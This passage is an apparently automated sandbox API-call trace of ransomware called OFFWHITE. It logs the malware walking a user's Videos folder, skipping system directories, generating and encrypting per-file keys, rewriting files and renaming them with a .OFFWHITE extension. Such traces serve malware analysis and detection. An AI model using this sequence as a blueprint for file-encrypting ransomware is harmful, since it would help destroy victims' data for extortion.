lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48a93030, ftCreationTime.dwHighDateTime=0x1d5e3de, ftLastAccessTime.dwLowDateTime=0xddf900f0, ftLastAccessTime.dwHighDateTime=0x1d5df0d, ftLastWriteTime.dwLowDateTime=0xddf900f0, ftLastWriteTime.dwHighDateTime=0x1d5df0d, nFileSizeHigh=0x0, nFileSizeLow=0x7a51, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="SWT0TXyvaYgE.swf", cAlternateFileName="SWT0TX~1.SWF")) returned 1 [0140.141] lstrcmpiW (lpString1="SWT0TXyvaYgE.swf", lpString2=".") returned 1 [0140.141] lstrcmpiW (lpString1="SWT0TXyvaYgE.swf", lpString2="..") returned 1 [0140.141] lstrcmpiW (lpString1="SWT0TXyvaYgE.swf", lpString2="...") returned 1 [0140.141] lstrcmpiW (lpString1="SWT0TXyvaYgE.swf", lpString2="windows") returned -1 [0140.141] lstrcmpiW (lpString1="SWT0TXyvaYgE.swf", lpString2="$recycle.bin") returned 1 [0140.141] lstrcmpiW (lpString1="SWT0TXyvaYgE.swf", lpString2="rsa") returned 1 [0140.141] lstrcmpiW (lpString1="SWT0TXyvaYgE.swf", lpString2="ntuser.dat") returned 1 [0140.142] lstrcmpiW (lpString1="SWT0TXyvaYgE.swf", lpString2="programdata") returned 1 [0140.142] lstrcmpiW (lpString1="SWT0TXyvaYgE.swf", lpString2="appdata") returned 1 [0140.142] lstrcmpiW (lpString1="SWT0TXyvaYgE.swf", lpString2="program files") returned 1 [0140.142] lstrcmpiW (lpString1="SWT0TXyvaYgE.swf", lpString2="program files (x86)") returned 1 [0140.142] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0140.142] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="SWT0TXyvaYgE.swf" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWT0TXyvaYgE.swf") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWT0TXyvaYgE.swf" [0140.142] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.142] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.142] PathFindExtensionW (pszPath="SWT0TXyvaYgE.swf") returned=".swf" [0140.142] lstrcmpiW (lpString1=".swf", lpString2=".exe") returned 1 [0140.142] lstrcmpiW (lpString1=".swf", lpString2=".log") returned 1 [0140.142] lstrcmpiW (lpString1=".swf", lpString2=".cab") returned 1 [0140.142] lstrcmpiW (lpString1=".swf", lpString2=".cmd") returned 1 [0140.142] lstrcmpiW (lpString1=".swf", lpString2=".com") returned 1 [0140.142] lstrcmpiW (lpString1=".swf", lpString2=".cpl") returned 1 [0140.142] lstrcmpiW (lpString1=".swf", lpString2=".ini") returned 1 [0140.142] lstrcmpiW (lpString1=".swf", lpString2=".dll") returned 1 [0140.142] lstrcmpiW (lpString1=".swf", lpString2=".url") returned -1 [0140.142] lstrcmpiW (lpString1=".swf", lpString2=".ttf") returned -1 [0140.142] lstrcmpiW (lpString1=".swf", lpString2=".mp3") returned 1 [0140.142] lstrcmpiW (lpString1=".swf", lpString2=".pif") returned 1 [0140.142] lstrcmpiW (lpString1=".swf", lpString2=".mp4") returned 1 [0140.142] lstrcmpiW (lpString1=".swf", lpString2=".OFFWHITE") returned 1 [0140.142] lstrcmpiW (lpString1=".swf", lpString2=".msi") returned 1 [0140.142] lstrcmpiW (lpString1="SWT0TXyvaYgE.swf", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0140.142] GetProcessHeap () returned 0x500000 [0140.142] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x522190 [0140.142] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWT0TXyvaYgE.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swt0txyvayge.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0140.143] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=31313) returned 1 [0140.143] GetProcessHeap () returned 0x500000 [0140.143] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0140.143] GetProcessHeap () returned 0x500000 [0140.143] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0140.143] GetProcessHeap () returned 0x500000 [0140.143] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0140.143] GetProcessHeap () returned 0x500000 [0140.143] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0140.143] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.143] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.143] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0140.143] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.143] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.143] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0140.143] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.143] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.143] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295e310*=0x100) returned 1 [0140.144] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.144] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.144] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295e30c*=0x100) returned 1 [0140.144] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x7a51, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.144] SetLastError (dwErrCode=0x0) [0140.144] WriteFile (in: hFile=0xb0, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0140.146] GetLastError () returned 0x0 [0140.146] GetLastError () returned 0x0 [0140.146] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x7b51, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.146] WriteFile (in: hFile=0xb0, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0140.146] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x7c51, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.146] WriteFile (in: hFile=0xb0, lpBuffer=0x522190*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x522190*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0140.146] GetProcessHeap () returned 0x500000 [0140.146] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x7a51) returned 0x55a7b8 [0140.146] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.146] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x7a51, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x7a51, lpOverlapped=0x0) returned 1 [0140.148] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.148] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x7a51, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x7a51, lpOverlapped=0x0) returned 1 [0140.148] GetProcessHeap () returned 0x500000 [0140.148] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0140.148] CloseHandle (hObject=0xb0) returned 1 [0140.150] GetProcessHeap () returned 0x500000 [0140.150] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0140.150] GetProcessHeap () returned 0x500000 [0140.150] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0140.150] GetProcessHeap () returned 0x500000 [0140.150] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0140.150] GetProcessHeap () returned 0x500000 [0140.150] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0140.150] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWT0TXyvaYgE.swf" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWT0TXyvaYgE.swf") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWT0TXyvaYgE.swf" [0140.150] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWT0TXyvaYgE.swf", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWT0TXyvaYgE.swf.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWT0TXyvaYgE.swf.OFFWHITE" [0140.150] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWT0TXyvaYgE.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swt0txyvayge.swf"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWT0TXyvaYgE.swf.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swt0txyvayge.swf.offwhite")) returned 1 [0140.151] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7101e30, ftCreationTime.dwHighDateTime=0x1d5e029, ftLastAccessTime.dwLowDateTime=0xaa07af90, ftLastAccessTime.dwHighDateTime=0x1d5dfb6, ftLastWriteTime.dwLowDateTime=0xaa07af90, ftLastWriteTime.dwHighDateTime=0x1d5dfb6, nFileSizeHigh=0x0, nFileSizeLow=0x113b9, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="SyZ1UR VgbXB1VAP.mkv", cAlternateFileName="SYZ1UR~1.MKV")) returned 1 [0140.151] lstrcmpiW (lpString1="SyZ1UR VgbXB1VAP.mkv", lpString2=".") returned 1 [0140.151] lstrcmpiW (lpString1="SyZ1UR VgbXB1VAP.mkv", lpString2="..") returned 1 [0140.151] lstrcmpiW (lpString1="SyZ1UR VgbXB1VAP.mkv", lpString2="...") returned 1 [0140.151] lstrcmpiW (lpString1="SyZ1UR VgbXB1VAP.mkv", lpString2="windows") returned -1 [0140.151] lstrcmpiW (lpString1="SyZ1UR VgbXB1VAP.mkv", lpString2="$recycle.bin") returned 1 [0140.151] lstrcmpiW (lpString1="SyZ1UR VgbXB1VAP.mkv", lpString2="rsa") returned 1 [0140.151] lstrcmpiW (lpString1="SyZ1UR VgbXB1VAP.mkv", lpString2="ntuser.dat") returned 1 [0140.151] lstrcmpiW (lpString1="SyZ1UR VgbXB1VAP.mkv", lpString2="programdata") returned 1 [0140.151] lstrcmpiW (lpString1="SyZ1UR VgbXB1VAP.mkv", lpString2="appdata") returned 1 [0140.151] lstrcmpiW (lpString1="SyZ1UR VgbXB1VAP.mkv", lpString2="program files") returned 1 [0140.151] lstrcmpiW (lpString1="SyZ1UR VgbXB1VAP.mkv", lpString2="program files (x86)") returned 1 [0140.151] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0140.151] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="SyZ1UR VgbXB1VAP.mkv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SyZ1UR VgbXB1VAP.mkv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SyZ1UR VgbXB1VAP.mkv" [0140.151] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.151] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.151] PathFindExtensionW (pszPath="SyZ1UR VgbXB1VAP.mkv") returned=".mkv" [0140.151] lstrcmpiW (lpString1=".mkv", lpString2=".exe") returned 1 [0140.151] lstrcmpiW (lpString1=".mkv", lpString2=".log") returned 1 [0140.151] lstrcmpiW (lpString1=".mkv", lpString2=".cab") returned 1 [0140.151] lstrcmpiW (lpString1=".mkv", lpString2=".cmd") returned 1 [0140.151] lstrcmpiW (lpString1=".mkv", lpString2=".com") returned 1 [0140.151] lstrcmpiW (lpString1=".mkv", lpString2=".cpl") returned 1 [0140.151] lstrcmpiW (lpString1=".mkv", lpString2=".ini") returned 1 [0140.151] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0140.151] lstrcmpiW (lpString1=".mkv", lpString2=".url") returned -1 [0140.151] lstrcmpiW (lpString1=".mkv", lpString2=".ttf") returned -1 [0140.151] lstrcmpiW (lpString1=".mkv", lpString2=".mp3") returned -1 [0140.151] lstrcmpiW (lpString1=".mkv", lpString2=".pif") returned -1 [0140.151] lstrcmpiW (lpString1=".mkv", lpString2=".mp4") returned -1 [0140.151] lstrcmpiW (lpString1=".mkv", lpString2=".OFFWHITE") returned -1 [0140.152] lstrcmpiW (lpString1=".mkv", lpString2=".msi") returned -1 [0140.152] lstrcmpiW (lpString1="SyZ1UR VgbXB1VAP.mkv", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0140.152] GetProcessHeap () returned 0x500000 [0140.152] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5221a0 [0140.152] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SyZ1UR VgbXB1VAP.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\syz1ur vgbxb1vap.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0140.152] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=70585) returned 1 [0140.152] GetProcessHeap () returned 0x500000 [0140.152] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0140.152] GetProcessHeap () returned 0x500000 [0140.152] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0140.152] GetProcessHeap () returned 0x500000 [0140.152] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0140.152] GetProcessHeap () returned 0x500000 [0140.152] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0140.152] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.152] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.152] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0140.152] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.152] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.152] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0140.152] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.152] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.152] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295e310*=0x100) returned 1 [0140.153] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.153] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.153] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295e30c*=0x100) returned 1 [0140.153] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x113b9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.153] SetLastError (dwErrCode=0x0) [0140.153] WriteFile (in: hFile=0xb0, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0140.155] GetLastError () returned 0x0 [0140.155] GetLastError () returned 0x0 [0140.155] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x114b9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.155] WriteFile (in: hFile=0xb0, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0140.155] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x115b9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.155] WriteFile (in: hFile=0xb0, lpBuffer=0x5221a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5221a0*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0140.155] GetProcessHeap () returned 0x500000 [0140.155] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x113b9) returned 0x55a7b8 [0140.155] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.155] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x113b9, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x113b9, lpOverlapped=0x0) returned 1 [0140.160] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.160] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x113b9, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x113b9, lpOverlapped=0x0) returned 1 [0140.160] GetProcessHeap () returned 0x500000 [0140.160] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0140.160] CloseHandle (hObject=0xb0) returned 1 [0140.162] GetProcessHeap () returned 0x500000 [0140.162] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0140.162] GetProcessHeap () returned 0x500000 [0140.162] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0140.162] GetProcessHeap () returned 0x500000 [0140.162] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0140.162] GetProcessHeap () returned 0x500000 [0140.162] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0140.162] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SyZ1UR VgbXB1VAP.mkv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SyZ1UR VgbXB1VAP.mkv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SyZ1UR VgbXB1VAP.mkv" [0140.162] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SyZ1UR VgbXB1VAP.mkv", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SyZ1UR VgbXB1VAP.mkv.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SyZ1UR VgbXB1VAP.mkv.OFFWHITE" [0140.162] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SyZ1UR VgbXB1VAP.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\syz1ur vgbxb1vap.mkv"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SyZ1UR VgbXB1VAP.mkv.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\syz1ur vgbxb1vap.mkv.offwhite")) returned 1 [0140.163] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc5132c0, ftCreationTime.dwHighDateTime=0x1d5e54d, ftLastAccessTime.dwLowDateTime=0xc54eb8f0, ftLastAccessTime.dwHighDateTime=0x1d5e7e7, ftLastWriteTime.dwLowDateTime=0xc54eb8f0, ftLastWriteTime.dwHighDateTime=0x1d5e7e7, nFileSizeHigh=0x0, nFileSizeLow=0x16a1e, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="u5rYaBKyN.mkv", cAlternateFileName="U5RYAB~1.MKV")) returned 1 [0140.163] lstrcmpiW (lpString1="u5rYaBKyN.mkv", lpString2=".") returned 1 [0140.163] lstrcmpiW (lpString1="u5rYaBKyN.mkv", lpString2="..") returned 1 [0140.163] lstrcmpiW (lpString1="u5rYaBKyN.mkv", lpString2="...") returned 1 [0140.163] lstrcmpiW (lpString1="u5rYaBKyN.mkv", lpString2="windows") returned -1 [0140.163] lstrcmpiW (lpString1="u5rYaBKyN.mkv", lpString2="$recycle.bin") returned 1 [0140.163] lstrcmpiW (lpString1="u5rYaBKyN.mkv", lpString2="rsa") returned 1 [0140.163] lstrcmpiW (lpString1="u5rYaBKyN.mkv", lpString2="ntuser.dat") returned 1 [0140.163] lstrcmpiW (lpString1="u5rYaBKyN.mkv", lpString2="programdata") returned 1 [0140.163] lstrcmpiW (lpString1="u5rYaBKyN.mkv", lpString2="appdata") returned 1 [0140.163] lstrcmpiW (lpString1="u5rYaBKyN.mkv", lpString2="program files") returned 1 [0140.163] lstrcmpiW (lpString1="u5rYaBKyN.mkv", lpString2="program files (x86)") returned 1 [0140.163] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0140.163] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="u5rYaBKyN.mkv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\u5rYaBKyN.mkv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\u5rYaBKyN.mkv" [0140.163] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.163] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.163] PathFindExtensionW (pszPath="u5rYaBKyN.mkv") returned=".mkv" [0140.163] lstrcmpiW (lpString1=".mkv", lpString2=".exe") returned 1 [0140.163] lstrcmpiW (lpString1=".mkv", lpString2=".log") returned 1 [0140.163] lstrcmpiW (lpString1=".mkv", lpString2=".cab") returned 1 [0140.164] lstrcmpiW (lpString1=".mkv", lpString2=".cmd") returned 1 [0140.164] lstrcmpiW (lpString1=".mkv", lpString2=".com") returned 1 [0140.164] lstrcmpiW (lpString1=".mkv", lpString2=".cpl") returned 1 [0140.164] lstrcmpiW (lpString1=".mkv", lpString2=".ini") returned 1 [0140.164] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0140.164] lstrcmpiW (lpString1=".mkv", lpString2=".url") returned -1 [0140.164] lstrcmpiW (lpString1=".mkv", lpString2=".ttf") returned -1 [0140.164] lstrcmpiW (lpString1=".mkv", lpString2=".mp3") returned -1 [0140.164] lstrcmpiW (lpString1=".mkv", lpString2=".pif") returned -1 [0140.164] lstrcmpiW (lpString1=".mkv", lpString2=".mp4") returned -1 [0140.164] lstrcmpiW (lpString1=".mkv", lpString2=".OFFWHITE") returned -1 [0140.164] lstrcmpiW (lpString1=".mkv", lpString2=".msi") returned -1 [0140.164] lstrcmpiW (lpString1="u5rYaBKyN.mkv", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0140.164] GetProcessHeap () returned 0x500000 [0140.164] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5221b0 [0140.164] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\u5rYaBKyN.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\u5ryabkyn.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0140.164] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=92702) returned 1 [0140.164] GetProcessHeap () returned 0x500000 [0140.164] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0140.164] GetProcessHeap () returned 0x500000 [0140.164] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0140.164] GetProcessHeap () returned 0x500000 [0140.165] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0140.165] GetProcessHeap () returned 0x500000 [0140.165] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0140.165] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.165] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.165] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0140.165] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.165] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.165] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0140.165] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.165] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.165] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, 